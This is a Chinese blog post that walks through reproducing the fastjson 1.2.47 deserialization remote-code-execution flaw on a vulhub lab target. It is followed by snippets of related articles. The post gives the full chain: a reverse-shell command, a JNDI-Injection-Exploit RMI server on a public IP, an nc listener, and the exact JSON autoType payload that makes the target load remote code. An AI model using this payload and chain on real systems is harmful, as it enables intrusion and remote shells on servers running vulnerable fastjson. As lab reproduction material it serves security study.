漏洞复现系列--fastjson<=1.2.47反序列化漏洞

最新推荐文章于 2025-04-17 15:32:06 发布
最新推荐文章于 2025-04-17 15:32:06 发布
阅读量2.2k 收藏 2
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40007043/article/details/107615314
版权

1.利用条件

fastjson <= 1.2.47

2.复现环境

靶机:vulhub靶场
在这里插入图片描述
攻击环境:一台公网vps,本地burp发送攻击数据包

3.具体步骤

1)docker起靶场
进入到vulhub靶场1.2.47-rce目录环境下

cd 1.2.47-rce
docker-compose up -d

浏览器访问靶场环境如下
在这里插入图片描述
2)反弹shell命令制作
https://krober.biz/misc/reverse_shell.php?ip=122.51.255.154&port=9443
在这里插入图片描述
将该bash命令加密
https://x.hacking8.com/java-runtime.html
在这里插入图片描述
3)起rmi服务器

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "加密后的反弹shell命令" -A "起rmi服务器的vps ip"

工具地址:https://github.com/welk1n/JNDI-Injection-Exploit
在这里插入图片描述
备注:我是用公网vps上的docker气的vulhub,rmi服务器也是用同一台vps起的,所以看ip可能有点迷糊

4)公网vps起监听

nc -lvp 9443

在这里插入图片描述

5)用浏览器访问靶机,修改burp抓取的数据包,主要修改的是标红处的数据包

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://122.51.255.154:1099/j3la6s",
        "autoCommit":true
    }
}

在这里插入图片描述
6)查看监听的端口
发现已经接收到了shell
在这里插入图片描述
4.总结
大致验证过成应该是这样,过了两天才写的记录,应该没什么遗漏吧。用dnslog验证的就没写了。

反序列化利用工具_Fastjson反序列化漏洞的检测和利用
weixin_30758169的博客
01-27 4868
Fastjson是Alibaba开发的,Java语言编写的高性能Json库,号称Java语言中最快的Json库。针对Fastjson反序列化漏洞原理分析和Poc网上以及有很多,本文仅分享如何快速发现Fastjson反序列化漏洞,方便安全测试人员开展安全测试及修补漏洞。文章中涉及到的工具和源码仅供安全测试和学习使用,否则后果自负,与作者无关。0x01反序列化原理Fastjson反序列化...
Fastjson反序列化漏洞
g1345444的博客
02-19 1151
下载地址:https://github.com/RandomRobbieBF/marshalsec-jar。下载地址:https://github.com/welk1n/JNDI-Injection-Exploit。下载地址:https://github.com/pmiaowu/BurpFastJsonScan。下载地址:https://github.com/a1phaboy/FastjsonScan。将TouchFile.java文件内容修改为以下代码。地址:http://www.dnslog.cn/
Fastjson反序列化
最新发布
一个热衷于网络安全的技术宅,这里记录我的学习轨迹、漏洞分析、CTF复盘和一些偏门技巧。 偶尔翻翻协议,常常调调漏洞,目标是在0和1之间找到属于自己的战斗力。
04-17 1019
JSON是一种轻量级的数据交换格式.它使用键值对(key-value)的结构表示数据,易于人阅读和编写,也易于机器解析和生成。虽然起源于 JavaScript,但现在已经成为编程语言之间通信的通用格式,比如在前后端之间传输数据、配置文件、接口请求等场景中广泛使用。
FastJson反序列化漏洞(CVE-2017-18349)
2301_76227305的博客
11-20 543
这个漏洞原理只要你把它搞懂了其实很简单的,不算难,而且无论什么版本的FastJson漏洞原理都是一样的。只不过是增加了一下黑白名单的过滤,也存在对应的绕过方法,搜一下payload即可。
fastjson(autoType)反序列化漏洞
qq_33163046的博客
08-13 1862
针对fastjson反序列化有关的安全问题。如果系统并非内部局域网使用,使用fastjson2并且不启用默认关闭的AutoType机制是最有效的安全做法。
Fastjson= 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 523
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
fastjson=1.2.47反序列化漏洞复现
DaWan
09-29 488
fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现 环境搭建 漏洞复现 创建一个java类: TouchFile.java // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
Fastjson=1.2.47反序列化漏洞复现
m0_48520508的博客
07-28 994
0x01简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 FastJson特点如下: (1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化成Java bean。 (2)顾名思义,FastJson操作JSON的速度是非常快的。 (3)无其他包的依赖。 (4)使用比较方便。 0x02漏洞介绍 Fastjson提供了aut
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6603
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3555
Fastjson 1.2.47反序列化漏洞复现
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan 一个简单的Fastjson反序列化检测burp插件 我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说burp搭配其他扫描器了,就连找到特定目录下的脚本我都觉得麻烦,所以,我决定一劳永逸地解决这个问题,于是去学习了一下burp插件的写法糊弄出了这个插件 安装方法 下载项目中的FastjsonScan.jar文件 在burp的Extender->Extensions栏,点击Add,选择下载好的jar文件就可以了(执行环境是Java) 如果成功安装,会输出如下信息,如果未能成功安装可以换下jdk版本??我用的1.8 使用方法 使用方法也很简单,就像使用repeater一样,你可以在burp的任何地方选中一个请求右键选择【Send to FastjsonScan
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 3514
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
fastjson反序列化漏洞
qq_63980959的博客
03-01 1964
Fastjson是一款开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。​ fastjson反序列化与weblogic、shiro反序列化类似,在客户端将json数据进行序列化传送至服务端后,服务端会将其反序列化读取其中数据,若客户端操控json数据,加入一些恶意类方法、代码,则可能会造成服务端代码执行。同时由于fastjson采用黑名单过滤的方式,也存在着被绕过的风险。
fastjson反序列化漏洞利用
weixin_44414845的博客
07-13 1397
漏洞利用环境和payload参考君来自:环境搭建注意点:配置一个好的镜像源。fastjson docker环境启动和关闭。
java执行脚本语言demo
Coder_android
11-11 1077
public class Test { /** * @param args * @throws IOException  */ public static void main(String[] args) throws IOException { // TODO Auto-generated method stub Process  process = Runtime.get
FastJson反序列化远程命令执行漏洞分析
moshao123的博客
03-17 915
FastJson反序列化漏洞分析 文章目录FastJson反序列化漏洞分析前言一、Fastjson的介绍二、简单使用1.引入库2.读入数据总结欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入
Fastjson反序列化漏洞深度解析及EXP汇总
Fastjson <= 1.2.47版本中就存在这类漏洞,这一问题已成为安全研究者和攻击者关注的焦点。攻击者利用这些漏洞,可能会执行不安全的代码,造成数据泄露、系统入侵等安全事件。 漏洞描述和利用 - Fastjson漏洞利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值